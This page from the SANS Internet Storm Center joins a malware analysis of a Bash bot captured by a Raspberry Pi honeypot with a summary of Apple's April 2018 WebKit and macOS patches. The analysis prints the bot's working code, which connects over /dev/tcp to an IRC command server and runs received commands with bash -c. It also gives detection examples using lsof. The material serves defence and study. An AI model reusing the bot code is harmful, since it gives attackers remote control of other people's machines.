Apple iOS and macOS Multiple Security Vulnerabilities
 
Apple iOS APPLE-SA-2018-04-24-1 Multiple Security Vulnerabilities
 
APPLE-SA-2018-04-24-3 Safari 11.1 (v. 11605.1.33.1.4, 12605.1.33.1.4, and 13605.1.33.1.4)
 
APPLE-SA-2018-04-24-2 Security Update 2018-001
 
APPLE-SA-2018-04-24-1 iOS 11.3.1
 

One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry.  It's a simple UNIX Bash script that performs a bunch of malicious tasks:

  • Kills existing crypto miner processes (classic action these days)
  • Changes the password of the user 'pi' and adds an SSH key
  • Changes the DNS resolver configuration and adds some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
  • Creates an IRC bot
  • Installs extra tools like zmap and sshpass
  • Installs itself in /etc/rc.local for persistence

The script itself is not new: it was already spotted in July 2017, but this variant looks slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is its ability to run a simple IRC bot using only Bash commands, with no need for a high-level language. Bash has had a very interesting feature for years that not many people are aware of: you can generate network flows using standard redirections. By default, a UNIX process always has the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:

$ echo "Hello world" >/dev/stderr

In the same way, Bash can use /dev/tcp or /dev/udp to generate network flows. The syntax is /dev/<proto>/<host>/<port>.

That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified):

eval 'exec 3<>/dev/tcp/$ircserver/6667;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
# Main loop
while [ true ]; do
    eval "read msg_in <&3;"
    if [[ ! "$?" -eq 0 ]] ; then
        break
    fi
    if  [[ "$msg_in" =~ "PING" ]] ; then
        printf "PONG %s\n" "${msg_in:5}";
        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        sleep 1
        eval 'printf "JOIN #biret\r\n" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
    elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
        privmsg_h=$(echo $msg_in| cut -d':' -f 3)
        privmsg_data=$(echo $msg_in| cut -d':' -f 4)
        privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
        hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
        sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

        if [[ "$sign" == "$hash" ]] ; then
            CMD=`echo $privmsg_data | base64 -d -i`
            RES=`bash -c "$CMD" | base64 -w 0`
            eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        fi
    fi
done

The magic line is the first one: it creates a new file descriptor ('3') that is used to read from and write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages once authenticated: the bot base64-decodes the command, computes its MD5 hash and compares it with the RSA signature it verifies using the public key stored in /tmp/public.pem. The result of the command is sent back to the sender.

Be aware that not all Bash binaries have this feature enabled: some builds disable it at compile time for security reasons. If you need this specific feature, you can always recompile Bash with the configure option '--enable-net-redirections'. This can be helpful in many cases; here is an example that grabs data from a remote server without any external tools:

# Open file descriptor 5 as a bidirectional TCP connection to blog.rootshell.be:80
exec 5<> /dev/tcp/blog.rootshell.be/80
# Send a minimal HTTP/1.0 request; the empty line terminates the request headers
printf "GET / HTTP/1.0\r\nHost: blog.rootshell.be\r\n\r\n" >&5
# Read the response until the server closes the connection
cat <&5
# Close the descriptor
exec 5>&-

A simple way to detect this behaviour is to search for network flows generated by /bin/bash processes. Example using lsof[3]:

# lsof -i | grep bash
bash      81084 xavier    5u  IPv4 0x1cbc30b70d8a7879      0t0  TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)
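Two defender-side checks that follow from the previous two paragraphs, written as an added example (this is not code from the diary or from the captured sample): the first tells you whether the installed Bash was built with net redirections, the second runs the lsof-based detection over a constructed sample of lsof output. It assumes English error messages from Bash and that nothing listens on local TCP port 9.

```shell
#!/bin/sh
# Added example (not from the diary or the sample): assess and detect
# Bash /dev/tcp usage on a host.

# Is the installed bash built with --enable-net-redirections?
# Returns 0 = enabled, 1 = disabled, 2 = no bash binary found.
# A bash without the feature treats /dev/tcp/... as an ordinary path and
# fails with "No such file or directory"; a bash with it attempts a real
# connect() and reports a socket error instead ("Connection refused",
# assuming nothing listens on 127.0.0.1:9). Assumes English messages.
bash_net_redirections() {
    command -v bash >/dev/null 2>&1 || return 2
    err=$(bash -c 'exec 3<>/dev/tcp/127.0.0.1/9' 2>&1)
    case "$err" in
        *"No such file or directory"*) return 1 ;;
        *) return 0 ;;
    esac
}

# Filter `lsof -i -n -P` output (stdin) down to TCP/UDP sockets held by
# shells and print "PID USER ENDPOINT [STATE]" for each match.
# Column layout: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME [STATE]
shell_net_flows() {
    awk '$1 ~ /^(bash|sh|dash|zsh|ksh)$/ && ($8 == "TCP" || $8 == "UDP") {
            line = $2 " " $3 " " $9
            if (NF >= 10) line = line " " $10
            print line
        }'
}

# Constructed sample of `lsof -i -n -P` output (not from a real host).
SAMPLE_LSOF='COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812   root    3u  IPv4  12345      0t0  TCP *:22 (LISTEN)
bash    81084 xavier    3u  IPv4  67890      0t0  TCP 10.0.0.5:57253->203.0.113.10:6667 (ESTABLISHED)
curl    81200 xavier    5u  IPv4  67891      0t0  TCP 10.0.0.5:57254->203.0.113.20:443 (ESTABLISHED)
bash    81301     pi    4u  IPv4  67892      0t0  TCP *:4444 (LISTEN)'

# Stand-alone run: report the build check, then flag the two shell sockets.
rc=0; bash_net_redirections || rc=$?
case "$rc" in
    0) echo "bash: /dev/tcp redirections enabled" ;;
    1) echo "bash: /dev/tcp redirections disabled at build time" ;;
    *) echo "bash: not installed" ;;
esac
printf '%s\n' "$SAMPLE_LSOF" | shell_net_flows
# On a live host: lsof -i -n -P | shell_net_flows
```

A shell holding a LISTEN socket is reported as well, since a bind shell is just as out of place as an outbound IRC session.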

[1] https://isc.sans.edu/honeypot.html
[2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
[3] https://www.forensicswiki.org/wiki/Lsof

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Apple today released updates for Safari, macOS and iOS. The patches fix 4 different vulnerabilities. The most severe of them affect WebKit and could be exploited to execute arbitrary code if a user visits a malicious site.

Note that WebKit is also included in tvOS and watchOS. A patch release for these operating systems may be imminent and I will update this article as I see them.

Vulnerability Overview

CVE            iOS  macOS/Safari  Severity
CVE-2018-4200  yes  yes           critical
CVE-2018-4204  yes  yes           critical
CVE-2018-4206  yes  yes           important
CVE-2018-4187  yes  yes           important

Safari 11.1

This update patches two vulnerabilities in WebKit. It also applies to the older, still supported versions of OS X / macOS (10.11 El Capitan and 10.12 Sierra) in addition to the latest version (10.13.4 High Sierra). iOS patches the same WebKit vulnerabilities.

Vulnerability | Impact | Description | CVE
WebKit | Processing maliciously crafted web content may lead to arbitrary code execution | A memory corruption issue was addressed with improved state management. | CVE-2018-4200
WebKit | Processing maliciously crafted web content may lead to arbitrary code execution | A memory corruption issue was addressed with improved memory handling. | CVE-2018-4204

macOS Security Update 2018-001 for macOS High Sierra 10.13

For macOS High Sierra (10.13), Apple patches two vulnerabilities: one in Crash Reporter and one in how URL links are displayed (LinkPresentation).

Vulnerability | Impact | Description | CVE
Crash Reporter | An application may be able to gain elevated privileges | A memory corruption issue was addressed with improved error handling. | CVE-2018-4206
LinkPresentation | Processing a maliciously crafted text message may lead to UI spoofing | A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. | CVE-2018-4187

iOS 11.3.1

4 vulnerabilities are patched in iOS 11.3. The update applies to iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.

The iOS update is essentially the sum of the macOS and Safari updates.

Vulnerability | Impact | Description | CVE
Crash Reporter | An application may be able to gain elevated privileges | A memory corruption issue was addressed with improved error handling. | CVE-2018-4206
LinkPresentation | Processing a maliciously crafted text message may lead to UI spoofing | A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. | CVE-2018-4187
WebKit | Processing maliciously crafted web content may lead to arbitrary code execution | A memory corruption issue was addressed with improved state management. | CVE-2018-4200
WebKit | Processing maliciously crafted web content may lead to arbitrary code execution | A memory corruption issue was addressed with improved memory handling. | CVE-2018-4204

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute